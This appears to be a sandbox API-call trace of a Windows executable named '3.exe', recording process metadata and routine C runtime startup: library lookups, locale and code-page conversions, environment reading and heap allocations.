# Flog Txt Version 1
# Analyzer Version: 3.1.2
# Analyzer Build Date: Oct 28 2019 11:51:53
# Log Creation Date: 07.11.2019 13:10:15.650

Process:
	id = "1"
	image_name = "3.exe"
	filename = "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3.exe"
	page_root = "0x4f5bf000"
	os_pid = "0x958"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "analysis_target"
	parent_id = "0"
	os_parent_pid = "0x0"
	cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe\" "
	cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "32"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 1
	os_tid = 0x95c

	[0023.635] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afd68 | out: lpSystemTimeAsFileTime=0x1afd68*(dwLowDateTime=0xbf08ef10, dwHighDateTime=0x1d5956c)) 
	[0023.635] GetCurrentThreadId () returned 0x95c
	[0023.635] GetCurrentProcessId () returned 0x958
	[0023.635] QueryPerformanceCounter (in: lpPerformanceCount=0x1afd60 | out: lpPerformanceCount=0x1afd60*=14376037011) returned 1
	[0023.656] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1
	[0023.656] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0
	[0023.656] GetLastError () returned 0x57
	[0023.656] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x0) returned 0x74b40000
	[0023.660] GetProcAddress (hModule=0x74b40000, lpProcName="InitializeCriticalSectionEx") returned 0x0
	[0023.660] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0
	[0023.660] GetLastError () returned 0x57
	[0023.660] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0
	[0023.662] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0
	[0023.662] GetLastError () returned 0x57
	[0023.662] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76c20000
	[0023.662] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b
	[0023.662] GetProcAddress (hModule=0x76c20000, lpProcName="FlsSetValue") returned 0x76c34208
	[0023.662] LoadLibraryExW (lpLibFileName="advapi32", hFile=0x0, dwFlags=0x800) returned 0x0
	[0023.662] GetLastError () returned 0x57
	[0023.662] LoadLibraryExW (lpLibFileName="advapi32", hFile=0x0, dwFlags=0x0) returned 0x74d40000
	[0023.663] GetProcAddress (hModule=0x74d40000, lpProcName="EventRegister") returned 0x7716f6ba
	[0023.663] EtwEventRegister () returned 0x0
	[0023.663] GetProcAddress (hModule=0x74d40000, lpProcName="EventSetInformation") returned 0x0
	[0023.663] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0
	[0023.663] GetLastError () returned 0x57
	[0023.663] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x0) returned 0x74b40000
	[0023.664] GetProcAddress (hModule=0x74b40000, lpProcName="InitializeCriticalSectionEx") returned 0x0
	[0023.664] GetProcessHeap () returned 0x540000
	[0023.664] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0
	[0023.664] GetLastError () returned 0x57
	[0023.664] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x0) returned 0x0
	[0023.664] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0
	[0023.664] GetLastError () returned 0x57
	[0023.664] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76c20000
	[0023.664] GetProcAddress (hModule=0x76c20000, lpProcName="FlsAlloc") returned 0x76c34f2b
	[0023.664] GetLastError () returned 0x57
	[0023.665] GetProcAddress (hModule=0x76c20000, lpProcName="FlsGetValue") returned 0x76c31252
	[0023.665] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x364) returned 0x55da68
	[0023.665] GetProcAddress (hModule=0x76c20000, lpProcName="FlsSetValue") returned 0x76c34208
	[0023.665] SetLastError (dwErrCode=0x57) 
	[0023.665] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0xc00) returned 0x55ddd8
	[0023.666] GetStartupInfoW (in: lpStartupInfo=0x1afc90 | out: lpStartupInfo=0x1afc90*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xe015a0, hStdOutput=0xe6c323f0, hStdError=0xfffffffe)) 
	[0023.666] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0023.666] GetFileType (hFile=0x3) returned 0x2
	[0023.667] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
	[0023.667] GetFileType (hFile=0x7) returned 0x2
	[0023.667] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
	[0023.667] GetFileType (hFile=0xb) returned 0x2
	[0023.668] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe\" "
	[0023.668] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe\" "
	[0023.668] GetLastError () returned 0x57
	[0023.668] SetLastError (dwErrCode=0x57) 
	[0023.668] GetLastError () returned 0x57
	[0023.668] SetLastError (dwErrCode=0x57) 
	[0023.668] GetACP () returned 0x4e4
	[0023.668] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x220) returned 0x55f1e0
	[0023.668] IsValidCodePage (CodePage=0x4e4) returned 1
	[0023.668] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1afcc0 | out: lpCPInfo=0x1afcc0) returned 1
	[0023.668] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x1af588 | out: lpCPInfo=0x1af588) returned 1
	[0023.668] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1afb9c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0023.668] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1afb9c, cbMultiByte=256, lpWideCharStr=0x1af328, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿàĀ") returned 256
	[0023.668] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿàĀ", cchSrc=256, lpCharType=0x1af59c | out: lpCharType=0x1af59c) returned 1
	[0023.668] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1afb9c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0023.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1afb9c, cbMultiByte=256, lpWideCharStr=0x1af2d8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᔠáĀ") returned 256
	[0023.669] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0
	[0023.669] GetLastError () returned 0x57
	[0023.669] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x0) returned 0x0
	[0023.669] GetProcAddress (hModule=0x76c20000, lpProcName="LCMapStringEx") returned 0x76cb47f1
	[0023.669] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᔠáĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256
	[0023.669] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿᔠáĀ", cchSrc=256, lpDestStr=0x1af0c8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256
	[0023.669] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x1afa9c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ8\x91=æØü\x1a", lpUsedDefaultChar=0x0) returned 256
	[0023.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1afb9c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256
	[0023.669] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x1afb9c, cbMultiByte=256, lpWideCharStr=0x1af2f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256
	[0023.669] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256
	[0023.669] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x1af0e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256
	[0023.669] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x1af99c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ8\x91=æØü\x1a", lpUsedDefaultChar=0x0) returned 256
	[0023.670] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x80) returned 0x55cff8
	[0023.670] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xe4ec00, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\3.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\3.exe")) returned 0x2b
	[0023.670] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x34) returned 0x54f250
	[0023.670] RtlInitializeSListHead (in: ListHead=0xe4e3b0 | out: ListHead=0xe4e3b0) 
	[0023.670] GetLastError () returned 0x0
	[0023.670] SetLastError (dwErrCode=0x0) 
	[0023.670] GetEnvironmentStringsW () returned 0x55f408*
	[0023.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1381
	[0023.670] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x565) returned 0x55fee0
	[0023.670] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1381, lpMultiByteStr=0x55fee0, cbMultiByte=1381, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1381
	[0023.670] FreeEnvironmentStringsW (penv=0x55f408) returned 1
	[0023.670] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x98) returned 0x55d080
	[0023.670] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x1f) returned 0x55ed18
	[0023.670] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x36) returned 0x55d120
	[0023.670] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x37) returned 0x55d160
	[0023.670] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x3c) returned 0x554cb0
	[0023.670] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x31) returned 0x55d1a0
	[0023.670] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x17) returned 0x55f408
	[0023.670] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x24) returned 0x558cc8
	[0023.670] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x14) returned 0x55f428
	[0023.670] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0xd) returned 0x5516b8
	[0023.670] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x25) returned 0x558cf8
	[0023.670] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x39) returned 0x554cf8
	[0023.670] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x18) returned 0x55f448
	[0023.670] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x17) returned 0x55f468
	[0023.670] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0xe) returned 0x5516d0
	[0023.670] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x69) returned 0x55f488
	[0023.670] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x3e) returned 0x554d40
	[0023.670] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x1b) returned 0x55ed40
	[0023.670] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x1d) returned 0x55ed68
	[0023.670] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x48) returned 0x554088
	[0023.670] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x12) returned 0x55f500
	[0023.671] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x18) returned 0x55f520
	[0023.671] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x1b) returned 0x55ed90
	[0023.671] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x24) returned 0x558d28
	[0023.671] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x29) returned 0x559318
	[0023.671] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x1e) returned 0x55edb8
	[0023.671] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x41) returned 0x5540d8
	[0023.671] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x17) returned 0x55f540
	[0023.671] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0xf) returned 0x5516e8
	[0023.671] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x16) returned 0x55f560
	[0023.671] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x2a) returned 0x559350
	[0023.671] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x29) returned 0x559388
	[0023.671] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x15) returned 0x55f580
